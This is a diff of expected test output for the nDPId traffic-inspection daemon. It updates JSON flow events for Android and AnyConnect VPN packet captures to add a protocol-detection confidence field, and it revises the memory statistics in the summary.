+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
+00630{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"proto":"Google","breed":"Acceptable","category":"Web"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","total-events-serialized":380}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 500/475
@@ -386,10 +386,10 @@
 ~~ total active/idle flows...: 63/63
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4849578 bytes
-~~ total memory freed........: 4849578 bytes
-~~ total allocations/frees...: 100475/100475
+~~ total memory allocated....: 4912179 bytes
+~~ total memory freed........: 4912179 bytes
+~~ total allocations/frees...: 102065/102065
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
-~~ json string max len.......: 2248 chars
-~~ json string avg len.......: 1275 chars
+~~ json string max len.......: 2354 chars
+~~ json string avg len.......: 1328 chars
diff --git a/test/results/anyconnect-vpn.pcap.out b/test/results/anyconnect-vpn.pcap.out
index 20c97547d..c379f6762 100644
--- a/test/results/anyconnect-vpn.pcap.out
+++ b/test/results/anyconnect-vpn.pcap.out
@@ -7,49 +7,49 @@
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"}
 00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569687241452,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":56,"pkt_l4_len":8,"ts_msec":1569687241452,"pkt":"AQBeAAABLH6BsEqhCABGwAAgGHkAAAECIZ0KAAAB4AAAAZQEAAARCu71AAAAAGluZyBzeXNjZmc="}
-00563{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
